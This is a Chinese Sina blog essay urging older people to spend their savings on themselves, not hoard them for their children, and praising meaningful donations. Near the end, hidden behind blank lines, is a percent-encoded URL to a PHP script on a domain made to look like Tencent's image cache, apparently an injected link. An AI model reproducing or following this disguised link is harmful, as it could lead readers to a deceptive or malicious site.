加载中…
个人资料
老猴随笔
老猴随笔
  • 博客等级:
  • 博客积分:0
  • 博客访问:1,592,173
  • 关注人气:442
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

你赚的钱不花,这钱是你的吗?

(2010-03-17 13:03:50)
标签:

赚钱

花钱

别人钱

自己钱

老年人花钱

分类: 情感

你赚的钱是你的吗?读者一看到这句连三岁小孩都能回答的问话,可能会引起疑问,难道自己赚的钱不是你自己的,而是人家的吗?笔者认为,赚钱仅仅是你获得资本的第一步,要看你赚的钱是不是你的,最终得看你有没有恰当地消费掉你赚的钱。如不这样,纵有金山银山,吝啬不用,你赚的钱依然不能完全说是你自己的。

人们千方百计地赚钱?目的在于积累资本,促进消费,用于花钱。在赚钱与花钱之间,我们既要赚钱,又要花钱,只赚不花,赚钱何用,只花不赚,钱从何来?谁赚的钱由谁使用,归谁拥有,自己花掉的钱,自己得到的享受,才是你自己的钱。因为:

钱是物质价值的体现,如果赚而不用,你手中的钱,仅仅停留的货币状态,钱的物质价值不能直接体现在你的身上,转化为你所需要的东西,那么,你赚的钱对你而言,仍然发挥不了应有的作用,这种性质的钱能完全说是你自己的吗?

你赚的钱,如果放着不用,表面上看是属于你的,面对不断增长的积累,你也会万分欣喜,实际上,只是暂时由你保管而已。一旦情况发生某些变化,致你无法、无权、无能、无力使用这笔钱时,你辛辛苦苦赚来的钱,无形中也会得而复失,付之东流,这时,你手中的钱也就不是你自己的了。

有很多老年人,年轻时,上有老,下有小,克勤克俭,舍不得花钱,拼命赚钱,以便自己成家立业、养育子女、赡养老人,应付突发急需,这是可以理解的。但当他们老了之后,手中的钱,到了该花的时候了。可是,不少老人还是看不穿、想不开,为了给子女多留下遗产,身后有个好名声,情愿放弃自己的钱财;为了体恤晚辈,赢得子女尊重,甘愿让子女“啃老”;为了平衡遗产,避免矛盾,私下贴这补那……,自己有钱,舍不得吃穿,经常哭穷,捂着不用,结果把自己赚的钱都花在子女身上,这些为子女花掉而自己没花到的钱,能说是你自己的钱吗?即使你手中还有钱,一旦你年迈多病,卧床不起,粒米不进,无力支配使用时,你只能望钱兴叹,当你撒手人寰,钱对你又有何用?你自己的钱不就名存实亡了吗?老人们千万不要做出这种对不起自己的傻事来。正因于此,“你手中的钱,花了,才是你自己的”,这个从老年生活实践中体会得到的深刻感受,成了眼下老人群体中正在热议与流传的话题,并被众多老年人理解与接受。

诚然,笔者说“你赚的钱,置之不用,不一定是你自己的”。这种说法并不是提倡我们不切实际、不留余地盲目消费,更不是让我们铺张浪费乱花钱,而是要求我们正确恰当地用好自己手中的钱,舍得花钱,不要把钱看得太重,捂得太紧,这对老年人来说显得尤其重要。

钱,身外之物,生不带来,死不带去;人,不附财物,赤条条来,赤条条去。在这里,奉劝老年朋友们,不要把钱看得过重,与自己过不去,拿自己的生命当儿戏,整天拿金钱的枷锁套住自己,钻在钱圈里,不可自拔,做金钱的奴隶。人,要想开点,看穿点,活得萧洒点,日子要过得有意义一点,对自己要负责一点,该办的事就要办,该花的钱就要花,使自己的晚年生活过得幸福快乐有滋有味。

顺便再说一点。看一个人手中的钱是不是你的,还要看你所花的钱是否有意义有价值。假如你用于别人或别处的钱,用得合情合理合法,而且很有意义,也应看作是你自己的钱。因为你的善举,使你的钱的价值和你的人生价值得到了增长和扩大,受到了社会的称赞与认可,你的钱也就更有意义更有价值了。例如:“五.一二”汶川大地震后,上海有位普通女教师,慷慨解囊,将自己卖得的400万元房产款如数捐赠给了四川灾区,受到了社会各界的注目与敬仰,这样捐献出来的钱,理所当然是她自己的钱。

 

 

 

 

 

 

 

 

 

  

  

http://%69%6d%67%63%61%63%68%65%2e%71%71%2e%63%6f%6d%2e%71%71%64%69%79%2e%69%6e%66%6f/a/s/m.php

0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有